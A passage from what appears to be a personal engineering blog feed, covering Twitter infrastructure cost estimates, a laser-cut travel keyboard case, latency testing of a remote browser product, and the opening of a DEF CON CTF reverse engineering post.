An ex-Twitter engineer who read a draft mentioned that a substantial fraction of all compute is ad-related. How much compute ads cost of course depends on exactly what kind of ML or real-time auctions go into serving the ads. Very basic ads would be super easy to fit, and Twitter makes $500M/year on “data licensing and other”. How much revenue you need to run a service depends on how expensive it is! You could imagine an alternate universe non-profit Twitter which just sold their public data dumps and used that for all their funding if their costs were pushed low enough.

Algorithmic Timelines / ML

Algorithmic timelines seem like the kind of thing that can’t possibly fit, but one thing I know from work at Anthropic is that modern GPUs are absolutely ridiculous monsters at multiplying matrices.

I don’t know how Twitter’s ML works, so I’ll have to come up with my own idea for how I’d do it and then estimate that. I think the core of my approach would be having a text embedding model turn each tweet into a high-dimensional vector, and then jointly optimize it with an embedding model on features about a user’s activity/preferences such that tweets the user will prefer have higher dot product, then recommend tweets that have unusually high dot product and sort the feed based on that. Something like Collaborative Filtering might work even better, but I don’t know enough about that to do estimates without too much research.
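To make the dot-product idea concrete, here is a toy sketch of scoring candidate tweets against a user embedding and sorting by score. It only illustrates the ranking step: the embeddings are made-up 2-dimensional vectors, `dot` and `rank` are hypothetical names, and training the two embedding models is out of scope.

```rust
/// Dot product of two equal-length embeddings.
fn dot(a: &[f32], b: &[f32]) -> f32 {
    a.iter().zip(b).map(|(x, y)| x * y).sum()
}

/// Candidate tweet indices sorted by descending dot product with the user embedding.
fn rank(user: &[f32], tweets: &[Vec<f32>]) -> Vec<usize> {
    let mut scored: Vec<(usize, f32)> = tweets
        .iter()
        .enumerate()
        .map(|(i, t)| (i, dot(user, t)))
        .collect();
    // total_cmp gives a total order on floats, so sorting cannot panic on NaN.
    scored.sort_by(|a, b| b.1.total_cmp(&a.1));
    scored.into_iter().map(|(i, _)| i).collect()
}

fn main() {
    let user = vec![1.0, 0.0];
    let tweets = vec![vec![0.2, 0.9], vec![0.9, 0.1], vec![-1.0, 0.0]];
    println!("ranked tweet indices: {:?}", rank(&user, &tweets));
}
```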

BERT is a popular sentence embedding model and clever people have managed to distill it at the same performance into a tiny model. Let’s assume we base our ML on those models running in bf16:

teraflop = 1e12 flop

tinybert flops = 1.2e9 flop in teraflop => 0.0012 teraflop

a100 flops = 312 teraflop/s

a40 flops = 150 teraflop/s

avg tweet rate * tinybert flops in teraflop/s => 6.9444 teraflop/s

delivery rate * tinybert flops / a100 flops in 1 => 4.4516

We need to do something with those BERT embeddings though, like check them against all the users. Normal BERT embeddings are a bit bigger but we can dimensionality reduce them down, or we could use a library like FAISS on the CPU to make checking the embeddings against all the users much cheaper using an acceleration structure:

embedding dim = 256

flops to check tweet against all users = daily active users * embedding dim * flop in teraflop => 0.064 teraflop

It's fine if the ML falls a bit behind during micro-bursts so let's use the average rate and see how much we can afford on some ML instances:

flops per tweet with p4d = 8 * a100 flops / avg tweet rate in teraflop => 0.4313 teraflop

flops per tweet with vultr = 4 * a40 flops / avg tweet rate in teraflop => 0.1037 teraflop
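The same estimate can be written out as plain Python, which makes the hidden inputs explicit. The tweet rate and daily active user count below are assumptions I back-derived from the results shown above (they reproduce the same numbers), and the dot product cost follows the calculation above in counting one flop per embedding dimension.

```python
# Worked version of the ML budget arithmetic above.
TERAFLOP = 1e12

tinybert_flops = 1.2e9           # flop to embed one tweet (from the text)
a100_flops = 312 * TERAFLOP      # theoretical flop/s per A100
a40_flops = 150 * TERAFLOP       # theoretical flop/s per A40
embedding_dim = 256

# Assumed inputs, back-derived from the results above rather than stated here.
avg_tweet_rate = 500e6 / 86400   # ~5787 tweets/s
daily_active_users = 250e6

# Compute needed to embed every tweet, in teraflop/s.
embed_load = avg_tweet_rate * tinybert_flops / TERAFLOP

# Compute to dot one tweet against every user, in teraflop.
check_all_users = daily_active_users * embedding_dim / TERAFLOP

# Compute budget available per tweet on each instance type, in teraflop.
budget_p4d = 8 * a100_flops / avg_tweet_rate / TERAFLOP
budget_vultr = 4 * a40_flops / avg_tweet_rate / TERAFLOP

print(f"embed load:       {embed_load:.4f} teraflop/s")
print(f"check all users:  {check_all_users:.3f} teraflop")
print(f"budget on p4d:    {budget_p4d:.4f} teraflop/tweet")
print(f"budget on vultr:  {budget_vultr:.4f} teraflop/tweet")
```

Both per-tweet budgets are larger than the 0.064 teraflop needed to check a tweet against all users plus the 0.0012 teraflop to embed it, which is the "room to spare" claim.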

Looks like the immense power of modern GPUs is up to the size of our task with room to spare! We can embed every tweet and check it against every user to do things like cache some dot products for sorting their timeline, or recommend tweets from people they don’t follow. I’m not tied to this ML scheme being the best, but it shows we have lots of power available!

One way this estimate could go wrong is by using the theoretical flops. Generally you can approach that (but not actually get there) by using really large batch sizes, fused kernels and CUDA Graphs, but I generally work with much bigger models than this so it may not be possible! There’s also a variety of things around PCIe and HBM bandwidth I didn’t estimate, and maybe real Twitter uses bigger better models! Algorithmic timelines also add more load on the timeline fetching, since more tweets are candidates and the timelines need sorting, but we do have plenty of headroom there.

I can’t put a number on this one because I’m confident I could fit some ML, but it also probably wouldn’t be as good as Twitter’s actual ML and I don’t know how to turn that into a prediction. Some ML designs also place much more load on other parts of the system, for example by loading lots of tweets to consider for each tweet actually delivered in the timeline.

Bandwidth costs: They can be super expensive or free!

So far we’ve just checked whether the bandwidth can fit out the network cards, but it also costs money to get that bandwidth to the internet. It doesn’t affect the machines it fits on, but how much does that cost?

OVHCloud offers unmetered 10Gbit/s public bandwidth as an upgrade option from the included 1Gbit/s:

bandwidth price = ($717/month)/(9Gbit/s) in $/GB => $0.0002/GB

My friend says a normal price a datacenter might charge for an unmetered gigabit connection is $1k/month:

friend says colo price = $1000/(month*Gbit/s) in $/GB => $0.003/GB

This is the cheapest tier cdn77 offers without "contact us", and they're cheaper than other CDN providers:

cdn77 price = (($1390/month)/(150 TB / 1 month)) in $/GB => $0.0093/GB

vultr price = $0.01/GB

cloudfront 500tb price = $0.03/GB
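The unit conversions behind these per-GB prices are easy to get wrong, so here is a small sketch of them. The average month length is my assumption (the calculator's exact month definition isn't shown), but it reproduces the rounded figures above.

```python
# Convert "unmetered" monthly pricing into an effective $/GB, assuming the
# link is kept fully saturated for the whole month.
SECONDS_PER_MONTH = 365.25 / 12 * 86400   # assumed average month length

def unmetered_price_per_gb(dollars_per_month, gbit_per_s):
    """Effective $/GB of a flat-rate link running at full utilization."""
    gb_per_month = gbit_per_s / 8 * SECONDS_PER_MONTH  # 8 bits per byte
    return dollars_per_month / gb_per_month

ovh = unmetered_price_per_gb(717, 9)     # upgrade from 1Gbit/s to 10Gbit/s
colo = unmetered_price_per_gb(1000, 1)   # friend's quoted gigabit price
cdn77 = 1390 / 150_000                   # $1390 for 150 TB = 150,000 GB

for name, price in [("ovh", ovh), ("colo", colo), ("cdn77", cdn77)]:
    print(f"{name}: ${price:.4f}/GB")
```

Note that the unmetered prices only look this cheap if you actually saturate the link around the clock; at lower utilization the effective $/GB rises proportionally.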

The total cost will thus depend quite a bit on which provider we choose:

delivery bandwidth cost = bandwidth price * delivery bandwidth in $/month => $129.8272/month

delivery bandwidth cost(bandwidth price = cloudfront 500tb price) => $16,070.67/month

Things get much worse when we include image bandwidth:

total bandwidth cost = bandwidth price * total bandwidth in $/month => $10,704.8395/month

total bandwidth cost(bandwidth price = cdn77 price) => $409,308.6018/month

I was surprised by the fact that typical bandwidth costs are way way more than a server capable of serving that bandwidth!

But the best deal is actually the Cloudflare Bandwidth Alliance. As far as I can tell Cloudflare doesn’t charge for bandwidth, and some server providers like Vultr don’t charge for transfer to Cloudflare. However if you tried to serve Twitter images this way I wonder if Vultr would suddenly reconsider their free Bandwidth Alliance pricing as you made up lots of their aggregate Cloudflare bandwidth.

Edit: My friend says his colo charges for 10Gbit/s at close to the OVH rate, and notes that bandwidth isn’t fungible in that if you try to constantly peg your connections serving the entire world you may run into upstream bottlenecks and get throttled. This may be a place where Cloudflare could help you (maybe at some cost) or where you’d have to colo next to an internet exchange or something.

How cheaply could you serve Twitter: Pricing it out

Okay, let’s look at some concrete servers and estimate how much it would cost in total to run Twitter in some of these scenarios.

Basics and full tweet back catalog on one machine with bandwidth on OVHCloud: 1TB RAM, 24 cores, 10Gbit/s public bandwidth, 360TB of NVMe across 24 drives

$7,079/month in $/year => $84,948/year

Basics, images, ML, replication and tweet back catalog with 8 CPU Vultr machines with 25TB NVMe, 512GB RAM, 24 cores and 25Gbps, plus one ML instance:

8 * 2.34$/hr + $7.4/hr in $/year => $228,963.2184/year

cost per year of images * 5 in $/year => $841,518.72/year

Basics, images and ML but not full tweet back catalog on one machine with an AWS P4D instance with 400Gbps of bandwidth, 8xA100, 1TB memory, 8TB NVMe:

$20,000/month in $/year => $240,000/year

total bandwidth cost(bandwidth price = $0.02/GB) in $/year => $10,600,798.32/year

To do everything on one machine yourself, I specced a Dell PowerEdge R740xd with 2x16 core Xeons, 768GB RAM, 46TB NVMe, 360TB HDD, a GPU slot, and 4x40Gbe networking:

server cost = $15,245

ram 32GB rdimms = $132 * 24 => $3,168

samsung pm1733 8tb NVMe = $1200 * 6 => $7,200

nvidia a100 = $10,000

hdd 20TB = $500 * 18 => $9,000

total server cost = server cost + ram 32GB rdimms + samsung pm1733 8tb NVMe + nvidia a100 + hdd 20TB => $44,613

colo cost = $300/month in $/year => $3,600/year

colo cost + total server cost/(3 year) => $18,471/year

So you do well on the server cost but then get obliterated by bandwidth cost unless you use a colo where you can directly connect to Cloudflare:

total bandwidth cost(bandwidth cost=friend says colo price) in $/year => $128,458.0741/year

Clearly optimizing server costs down to this level and below isn’t economically rational, given the cost of engineers, but it’s fun to think about. I also didn’t try to investigate configuring an IBM mainframe, which stands a chance of being the one type of “machine” where you might be able to attach enough storage to fit historical images.

For reference in their 2021 annual report, Twitter doesn’t break down their $1.7BN cost of revenue to show what they spend on “infrastructure”, but they say that their infrastructure spending increased by $166M, so they spend at least that much and presumably substantially more. But probably a lot of their “infrastructure” spending is on offline analytics/CI machines, and plausibly even office expenses are part of that category?

Conclusion

The real conclusion is kinda up in the middle, but I had a lot of fun researching this project and I hope it conveys some appreciation for what hardware is capable of. I had even more fun spending tons of time reading papers and pacing around designing how I would implement a system that let you turn a Rust/C/Zig in-memory state machine like my prototype into a distributed fault-tolerant persistent one with page swapping to NVMe that could run at millions of write transactions per second and a million read transactions per second per added core.

I almost certainly won’t actually build any of this infrastructure, because I have a day job and it’d be too much work even if I didn’t, but I clearly love doing fantasy systems design so I may well spend a lot of my free time writing notes and drawing diagrams about exactly how I’d do it:

Thanks to the 5 ex-Twitter engineers, some of whom worked on performance, who reviewed this post before publication but after I made my predictions, and brought up interesting considerations and led me to correct and clarify a bunch of things! Also to my coworker Nelson Elhage who offered good comments on a draft around reasons you wouldn’t do this in practice.

My DIY ergonomic travel workstation with aluminum and magnets

2022-11-06T00:00:00+00:00

Ever since moving from NYC to SF to work at Anthropic I’ve been visiting NYC and working remotely quite often. So I designed myself a travel workstation that lets me get the best of ergonomics and packability.

It includes a few off-the-shelf items, and a custom-designed laser cut aluminum keyboard case that doubles as a lap-board to hold my keyboard and trackpad:

I can use the keyboard and Magic Trackpad on a desk or on my lap, with the folding laptop stand keeping the screen at a comfortable height. The keyboard is a Sofle Choc I soldered together from a kit, modified with Purpz low force switches which I find way more comfortable than standard-force, and nice!nano wireless controllers.

The case only cost around $40, despite being made out of 3 different profiles made of very robust 2mm thick aluminum plate and only ordering two. It turns out SendCutSend is a magical service that offers ridiculously cheap custom laser cutting of lots of materials with less than one week turnarounds.

I’ve now been using it and traveling with it for many months and it’s been really great. I’m not aware of any similar off-the-shelf setup that combines a super light nice ergonomic keyboard with a Magic Trackpad on a lap board, that can be protected by a robust carrying case.

Transforming with magnets

The whole thing uses tons of little neodymium magnets super-glued in to the plates and gel taped to the electronics, to allow easily moving between the lap board configuration and a robust carrying case configuration to put in my bag. The keyboard halves snap into two different positions, one spread out and another closer together fully inside the case. The top half of the case also snaps on with magnets, with tabs to hold it in place horizontally.

The Magic Trackpad is far more robust than the keyboard PCBs so I shove it in a different small pocket of my bag.

Other setups

I can also use it to create a very comfortable reclined working setup by combining the lap board with a comfy recliner and a recliner laptop stand. The displays on modern Macbooks are really good and make this kind of setup a really comfortable way to use a computer. The stand arm just swings out of the way, and I place the lap board on the side table when I want to use the chair normally.

Or combine it with a standing desk:

Optimizing sleeping on flights

My other big travel optimization has been taking overnight flights and sleeping on them, which I didn’t used to be able to do without waking up constantly due to my neck hurting. I first mostly solved this using a trtl pillow, which unlike classic airplane pillows doesn’t constrict my neck blood flow and actually allows me to lean my head to the side.

Then my coworker recommended getting a medical foam cervical collar, which was even better and completely eliminated my neck pain sleeping on flights. I first got one that was too short, and then found the one I linked which suggests how to measure your chin height and offers a larger size. That one is also black which looks less medical.

If you don’t like standard foam ear plugs, I also recommend trying wax ear plugs which you shape into a pancake over your ear opening. They feel weird in a different way which is less stuffy and more comfortable for me.

More detail

I did my design in Fusion 360, and the first version I ordered was just a lap board, which I then had to hack adding a magic trackpad mount onto without quite enough space by stacking it on some hardboard:

I had the combo case/lapboard idea for the second version, and at first I planned to have an identical top and bottom plate. But SendCutSend prices are higher the more holes you want them to cut, so especially given I was also ordering a case for a friend, it was cheaper (and nicer looking) to have a separate top and bottom plate. The little indents on the side of the case were for in case the magnets didn’t work well and I needed to keep it closed by sliding elastic ribbons over it. You can download the DXF files if you want to order them yourself here

I then assembled it using cyanoacrylate glue, 6mm neodymium magnets, and double-sided gel tape to attach the magnets to the keyboard and trackpad. I needed to use sticky tack on the back of the magnet holes while putting the glue in so it wouldn’t run out. I also put neoprene foam on the back of the case to make it comfortable and grippy on my lap or the desk. I also reinforced the spacer joints with hot glue after super-gluing them, for redundancy at the cost of aesthetics. It took about 2 hours to assemble the case.

Before assembling it, I used a sharpie through the holes to mark dots on the back of the electronics, so that I could superglue magnets in place. I had to make sure to get the polarity of the magnets right so that the keyboard snapped in both positions. I went with opposite polarity on the left and right sides, that way I can attach the keyboard halves to each other for a lighter more fragile keyboard-carrying setup, and also kind-of attach the Magic Trackpad to the back of the case while it’s closed (I only thought of this after, the center magnets hurt this).

More on the Sofle Choc keyboard kit

The keyboard kit took me around 3.5 hours to solder. I’m really happy with the low force Purpz switches. I started using low force switches back with my original keyboard build when I had RSI issues and I think they made a noticeable difference then, and nowadays I still find them more comfortable. I’m not happy about soldering in the rotary encoders, I never use them and they add height, but I can’t really remove them now. The wireless controllers were nice for a bit, and it’s nice not to have a cable between the sides, but the battery life of the primary half is bad and I messed up the pairing a bit, so I mostly use it with a cable nowadays, this may be fixable. I’m quite happy with the Sofle Choc overall, the thumb keys are comfortable close to the main keyboard and it has lots of them, although the thumb keys all being in a line can make it hard to hit the right one relative to more clustered designs.

Other fun with SendCutSend

I haven’t really done any bloggable programming projects this year, because I’ve been doing more hardware stuff (and more socializing).

Some other stuff I’ve made with SendCutSend has included some prototype backing plates for the super bright LED lighting bar I’m designing:

I’ve also experimented with using DALL-E to ask for “minimalist black and white line art”, using vector tracing software, then cleaning up and modifying the design in Inkscape. This lets me create custom laser cut metal wall art cooler than I could design myself. Shown below are a powder-coated steel sign for a joke group house name, and brass snakes I helped make for someone:

Latency testing remote browsing: Why display streaming is hard

2022-05-15T00:00:00+00:00

Ever since I built my light sensor based latency tester, I’ve wanted to use it to illuminate where the added latency of remote desktop / display streaming systems really comes from. In fall of 2021 I was let into the beta program of a remote browser startup I’ll call Remotey (not their real name)¹. The idea is that you can save RAM on your machine and take advantage of powerful cloud computers with gigabit networking, but it means many interactions no longer take place on-device. I’ll use various latency tests I did with their product to illustrate the challenges inherent in providing a nice remote display experience on high-resolution displays, and talk about optimizations they could make to be much snappier.

Why this remote browser?

Their product is part of a new generation of app streaming systems which take advantage of GPU-accelerated encoding/decoding of common video compression formats. Examples include all the major game streaming services like GeForce Now and Google’s Stadia. Unfortunately, there’s a few things which make it tricky to use this approach to compete with legacy remote access systems let alone running locally for normal desktop apps like browsers. Parsec looks like a good try at doing so, but I haven’t tested it. I’m testing their remote browsing product because unlike Parsec, they provide a GPU-equipped remote server a mere 16ms ping from my NYC apartment for me.

All that is to say, while I’m going to talk about issues with this system and how it could be improved, I expect many of these issues apply to other desktop app streaming systems as well.

Typing latency

Let’s start by testing the latency between pressing a key and it appearing on screen in a text field, since that’s one of the simplest types of latency. I went to about:blank in Remotey and Chrome and added a <textarea> tag using the web inspector.

My latency tester sends USB events to repeatedly type a and backspace it, then types out summary lines. Here’s some simplified summary lines annotated with what I was measuring:

109ms +/-  15.2 (n=75) |        _5933_ __         | Remotey 4k window
 42ms +/-   8.6 (n=77) |   791_                   | Chrome 4k window
 37ms +/-   3.9 (n=33) |   94                     | Chrome small window
 95ms +/-  18.5 (n=65) |     11359741_            | Remotey small window
212ms +/-  24.0 (n=53) |                  _79652_ | Remotey 3780x6676 window

Despite the fact that my network round-trip to my Remotey server is only 16ms, Remotey adds around 67ms of latency with a maximized 4k window. The results for a local Chrome of close to 40ms for varying window sizes are about as good as I’ve seen for any app when measured at the top of my Dell S2721Q monitor like this was, which means they’re close to the minimum latency a macOS desktop app can have.

This isn’t as bad as it may sound though. I can notice the difference, but mainly in that it’s just a bit less pleasant. An extra 70ms of typing latency is at the level where, if you added it consistently to most people’s computers between sessions, many wouldn’t notice anything was wrong; it would just feel a tiny bit worse. Many people use keyboards that add 40ms of latency or screens that add 30ms. This is a problem Remotey pays attention to: they actually have a keyboard latency graph window accessible in their Debug menu, which shows latencies about 20ms lower than my end-to-end measurements, presumably because they don’t include the compositor/screen/USB stack.

Encoding the whole window means latency scales with window size

The interesting thing about these tests is how they show that Remotey’s latency scales with window size, even when only a small region changes. Most legacy remote desktop systems will use something called “damage regions” that apps provide to the OS compositor, in order to only process the pixels that change during small updates like typing. Even without such a system, it’s possible to diff tiles of a 4k screen image in under 2ms on a single CPU core to detect the changed region.
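As a rough illustration of the tile diffing idea, here is a minimal sketch. It is not how any particular remote desktop system does it, the frame representation (one `bytes` object per pixel row, one byte per pixel) is an assumption to keep it short, and pure Python like this will be nowhere near the 2ms figure, which needs native code.

```python
# Hypothetical sketch: find which tiles changed between two frames.

def changed_tiles(prev, curr, tile=64):
    """Return the set of (tile_row, tile_col) whose pixels differ between frames."""
    changed = set()
    for y, (old_row, new_row) in enumerate(zip(prev, curr)):
        if old_row == new_row:
            continue  # fast path: the whole pixel row is unchanged
        for x in range(0, len(new_row), tile):
            if old_row[x:x + tile] != new_row[x:x + tile]:
                changed.add((y // tile, x // tile))
    return changed

def bounding_box(tiles, tile=64):
    """Pixel-space (left, top, right, bottom) rectangle covering all changed tiles."""
    rows = [r for r, _ in tiles]
    cols = [c for _, c in tiles]
    return (min(cols) * tile, min(rows) * tile,
            (max(cols) + 1) * tile, (max(rows) + 1) * tile)

# Simulate typing one character: a single pixel changes at x=70, y=10.
width, height = 256, 128
prev = [bytes(width) for _ in range(height)]
curr = list(prev)
row = bytearray(width)
row[70] = 255
curr[10] = bytes(row)

damage = changed_tiles(prev, curr)
print(damage, bounding_box(damage))
```

Only the one tile containing the changed pixel is reported, so an encoder working from this would have a 64x64 region to process instead of the whole window.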

One disadvantage of the hardware accelerated video encode approach is that using minimal damage regions is tricky, because all you have is a vendor-provided API to encode new full frames into a video stream, and you can’t count on the vendor to optimize their encoder for large pixel-equal screen regions getting encoded very quickly. You could split the screen into many separate tile video streams, but that may or may not lead to encode/decode latency problems if the API/hardware isn’t optimized for many small streams, and artifacts may be hard to avoid. Another approach might be to have a separate side channel stream where you quickly send the small changed image patch to paste over the video, then update the video stream in the background the usual way.

In the last test above I set the 4k monitor to one of macOS’s non-integer scaled presets. When you do this, macOS will internally render a larger resolution at 2x scaling and then downscale the image. This causes huge internal resolutions that can cause performance issues even on native apps: the Preferences screen warns “Using a scaled resolution may affect performance”, and while some apps may seem fine, others like Remotey suffer. The full screen encoding approach relies on GPU encoding/decoding hardware keeping pace with growing screen resolutions, and can suffer when you try to jump to larger sizes.

H264 is lower latency but not the default

The numbers above get better when you use Remotey’s Debug menu to “Enable H264 encoding”, where the default is H265:

109ms +/-  15.2 (n=75) |        _5933_ __         | Remotey 4k window H265
 99ms +/-   8.7 (n=37) |        2691_             | ^ same but H264
 95ms +/-  18.5 (n=65) |     11359741_            | Remotey small window H265
 83ms +/-   9.1 (n=57) |      _9842               | ^ same but H264

The modern H265 encoding standard is better at compression, allowing more changing pixels to be streamed over a lower bandwidth connection, but it comes at the cost of more time spent encoding and decoding, which is where most of the lag comes from on highly compressible changes like this typing latency test.

Scrolling

Probably the most common operation while browsing the web is scrolling. I reconfigured my latency tester to scroll up and down small amounts, and then went to figma.com and had it scroll with the light sensor across a colored section transition:

119ms +/-  29.1 (n=94) |       _ 279921_      _   | Remotey 4k scroll H265
138ms +/-  12.9 (n=21) |           55997 1        | Remotey 4k scroll H265 50%
113ms +/-  11.5 (n=63) |         19551            | Remotey 4k scroll H264
146ms +/-  18.2 (n=60) |           234965 1       | Remotey 4k scroll H264 50%
 89ms +/-   6.5 (n=36) |      _9588_              | Chrome 4k smooth scroll
 49ms +/-   6.1 (n=52) |   _96                    | Chrome 4k non-smooth scroll

There’s some interesting things to see here:

Scrolling is a bit higher latency than typing. This is unsurprising given the approach, since even though motion vector encoding lets it not re-encode the whole image, it doesn’t succeed at compressing the frames quite as much as with typing, and encoding/decoding may be more expensive.
If we zoom the page out to 50% page zoom, scrolling gets slower despite the equivalent pixel count, presumably because there’s more visual entropy on screen and so encoding/decoding gets more expensive and frames get larger. Here H265 encoding starts to win out presumably due to better compression.
With the default macOS settings Chrome smooths USB mouse wheel scrolling to accelerate gradually, so it takes longer for the light sensor to cross the color transition, whereas Remotey scrolls instantly. If I disable macOS smooth scrolling for Chrome, it becomes nearly as fast as typing.

Scrolling is an interesting case for the video compression approach to display streaming. A compression approach specialized to scrolling could look for tiles of pixels at exact vertical offsets and then only send the tiles which aren’t translated copies. I haven’t found a major remote desktop system that does this, despite the importance of scrolling, but I implemented a version using an efficient tile row hashing technique which can process a 4k screen in 2ms on one core in an unmerged xrdp branch. This would dramatically cut encode/decode time and bandwidth for scrolling, and thus latency.
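Here is a simplified sketch of scroll detection by row hashing. It is not the code from my xrdp branch: it hashes whole pixel rows rather than tiles, brute-forces the offset search, and the function names and frame representation (one `bytes` object per row) are invented for the example.

```python
# Hypothetical sketch: detect a vertical scroll and find the rows still worth sending.

def detect_scroll(prev, curr, max_offset=200):
    """Return (dy, matched): the offset where curr[y] == prev[y + dy] for the most rows."""
    old = [hash(row) for row in prev]
    new = [hash(row) for row in curr]
    height = len(new)
    best = (0, sum(o == n for o, n in zip(old, new)))  # dy=0 means no scroll
    for dy in range(-max_offset, max_offset + 1):
        if dy == 0:
            continue
        matched = sum(1 for y in range(height)
                      if 0 <= y + dy < height and new[y] == old[y + dy])
        if matched > best[1]:
            best = (dy, matched)
    return best

def rows_to_send(prev, curr, dy):
    """Rows of curr that are not translated copies of prev rows (compares real pixels)."""
    height = len(curr)
    return [y for y in range(height)
            if not (0 <= y + dy < height and curr[y] == prev[y + dy])]

# A 150-row "page" with distinct rows, viewed through a 100-row window.
page = [bytes([i]) * 16 for i in range(150)]
prev = page[0:100]
curr = page[5:105]   # the user scrolled down by 5 rows

dy, matched = detect_scroll(prev, curr)
fresh = rows_to_send(prev, curr, dy)
print(dy, matched, fresh)
```

After a 5 row scroll, 95 of the 100 rows are recognized as copies and only the 5 newly revealed rows need to be encoded and sent.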

However, video compression systems use a much more general compression approach using motion vectors that gets at least some of the same bandwidth benefits, while being more robust. While my algorithm is great on normal scrolling, a fancy Apple product or startup website scrolljacking animation would cause lots of tiles not to be covered by the scrolling optimization and reduce its effectiveness. Video compression would keep working great as long as the motion was smooth. Like damage regions, it’s unfortunately tricky to integrate scrolling optimization with video compression, although again the approach of a separate lower latency side channel stream to preempt the video may work.

Remotey’s potential advantage, which they don’t use

Above I talked about how to optimize scrolling from the perspective of general display streaming, but Remotey’s specialization for Chrome gives them a potential huge advantage that they don’t currently use. Remotey could in theory integrate with the Chrome renderer to render contents outside the current browser viewport and preemptively send it to the client. This would allow small scrolls to be resolved instantly on the client without any networking or decoding, and the networking could catch up behind.

There’s a number of difficulties in this related to things like fixed position page elements, but interestingly solutions to all these problems are already implemented inside Chrome (and other browsers). Browsers already use a variation of this technique to avoid rendering latency on scrolling by rasterizing tiles of the page as layers, which the browser’s compositor then re-composites as you scroll without having to hit the renderer. In fact these are sometimes implemented as separate processes in the browser communicating over an IPC channel, basically like a higher-bandwidth lower latency network!

In principle Remotey could work by forwarding the browser at the layer level as opposed to the composited pixel level, and get minimal damage regions and scrolling optimization for free. The catch is that there’s some cases like YouTube videos and fancy animations that video compression would handle much better than remoting layers with static image compression would. This means if you don’t want to have unintuitive performance cliffs you need to combine some kind of difference-based video compression with the layer remoting, and that could get super complex, especially if you try to use video compression hardware. I see why they chose the approach they did, at least for now.

Gotchas on macOS

When undertaking any kind of unusual native app project, there’s a bunch of tiny gotchas you need to know about to avoid your app being slower or more power-hungry than it needs to be. Approximately nowhere tells you about avoiding these things, hence why I’m writing about them! Let’s look at some of the common macOS gotchas and whether Remotey gets them right:

Does it force use of the discrete GPU? Yes. This is the most common mistake for GPU rendered apps to make, and it causes dual-GPU systems like my 16” Macbook Pro to go from around 10W idle to 15W. Avoiding this requires some extra Metal API calls.
Does it constantly send 60fps compositor updates? No. A lot of apps make this mistake but Remotey doesn’t. If you mess it up it causes WindowServer to take an extra 10-20% CPU and extra power, not even attributable to the app without using Quartz Debug. The harder one to avoid is not having any animations that can get stuck going even with the window in the background, I’ve at least once had a Remotey tab stuck loading in the background, which caused updates to fire constantly.
Does it re-composite the entire window even for small changes? Yes. This is purely a power optimization, but it’s possible to tell the compositor when only a small part of your window changed, so it needs to do less work. A tiny loading spinner animation causes WindowServer to use an extra 10% of a core. The Core Animation APIs make it harder to avoid this on macOS than other platforms when using a custom renderer like Remotey, but Chrome uses a hack to manage it.
Does it use a transparent window for opaque content? No. Most macOS windows use a large opaque compositor layer with tiny transparent corners, but if you use the wrong API you can get one giant transparent layer, causing extra compositing work. Firefox had this problem for a long time, Remotey does not.
Does live resize go blank? Yes. Supporting smooth resizing can be tricky even for local GPU-rendered apps, Remotey has a much trickier distributed systems problem to solve, and it understandably goes blank when resizing.
Does it break when moving the window to a display with a different scale factor? Kinda yes. Remotey initially appears to handle this case smoothly, but when I did testing on my 4k display at 1x scaling I experienced huge 1-10s latency spikes when doing things like switching tabs and latency is generally higher. My guess is the remote Linux is still rendering at 2x scaling so has to deal with an enormous 8k resolution and has trouble or something.

Page loading

In my testing Remotey was only slightly faster at loading pages than my home 500Mbps connection:

https://www.apple.com/iphone-12/: ~3.4s Remotey vs ~3.8s Chrome
https://figma.com/: ~3.8s Remotey vs ~3.9s Chrome
https://thume.ca/2017/06/17/tree-diffing/: ~240ms Remotey vs ~240ms Chrome

These were just done casually averaging a few tries using the Chrome network inspector with caching disabled, I don’t claim they’re super scientific. Just that I didn’t notice a significant difference between my good home internet and their datacenter connection for page loading.

General experience

All of the above is interesting from a technical discussion standpoint, but in terms of Remotey as a product it focuses on measurable and interesting things rather than what’s important.

In general I’d say the overall smoothness of Remotey and its display streaming is quite good compared to other remote display technologies I’ve used. Although I haven’t used Parsec or Teradici, which would be the two I would guess based on technology might be comparable or better. The scrolling at high resolutions especially is quite smooth. There’s also no noticeable video compression artifacts, even on scrolling text, which is an issue I’ve noticed sometimes when video compression is added on to a legacy remote desktop system. Even watching YouTube videos works great.

Compared to my local Chrome though, Remotey isn’t for me. I have a fairly powerful laptop with 32GB of RAM, and don’t use any super heavy browser apps like Onshape, so Remotey is basically a straight downgrade. It drops frames when scrolling noticeably more often, interactions are noticeably just a bit laggier, it uses a bit more battery and integrates a little less smoothly (e.g no live resize). Those aren’t huge downsides though, it’s just that I don’t experience any compensating upsides. If I was someone who regularly found my browser very laggy, due to having a much weaker computer or heavier browser apps, I could imagine using Remotey.

Conclusion

Remotey is an interesting case study of how the new style of display streaming using hardware video compression can provide nicer experiences than older technologies while making it hard to implement further optimizations. Other systems like VNC, Citrix and Microsoft RDP which use custom CPU image patch compression make it really easy to implement all sorts of specialized tricks, but struggle on modern high resolutions, and fall off a cliff on hard cases like games and YouTube videos unless they adaptively switch to video compression.

I expect that higher bandwidth connections, new streaming technologies, and trends like increased working from home and potentially VR meeting rooms/offices, will make display streaming a field that remains interesting over the next few years. I find this area pretty interesting and hope to follow progress and maybe do some more tinkering. I would pitch myself as a consultant with this post as a work sample, but I have a full time job and my US visa status means I can’t earn income any other way, so instead you can feel free to email me and maybe I’ll be interested enough to chat about it.

Drafts of this post mentioned who the startup was, but they reasonably asked that I not leave outdated measurements and statements about their constantly improving product tied to their name. Even if you guess who the startup is, they’ve likely substantially improved performance and implemented fixes since I did these measurements in September 2021. Ideally don’t speculate using their real name in comments.

Making reverse engineering tools for DEF CON Quals

2021-05-09T00:00:00+00:00

Last weekend I played with Samurai in the DEF CON CTF Quals where I worked on a crazy problem which involved exploiting a program binary for a made-up architecture, which was running on a VM written for a weird made-up parallel machine architecture, running on another VM for that parallel machine which we only had outdated incorrect source code for.

Because of this crazy nested weird VM setup, my teammates and I spent most of our time building some really cool tooling for these two architectures so that we could figure out the program, understand the vulnerability, and test our exploit.

Full write-up from my teammate

My teammate Zack did an excellent write-up of the problem and our tools; go read it. He shows off the Binary Ninja disassembly plugin he wrote to make it easy to reverse-engineer the inner binary in an excellent UI. He also gives an overview of the work my other teammates and I did. It was really fun working with Zack, Sam, Emma, Brock and occasional others in Discord late into the night at various levels of exhaustion, often sharing screens and pair programming.

Reversing the Manchester VM binary

I first worked to help reverse-engineer the changes to the Manchester parallel machine interpreter that they had made since the previous year’s challenge using a similar machine that they had released code for. It made for some really fun reversing to have source code to reference but things had changed since and we needed to figure out what the changes did using only the binary.

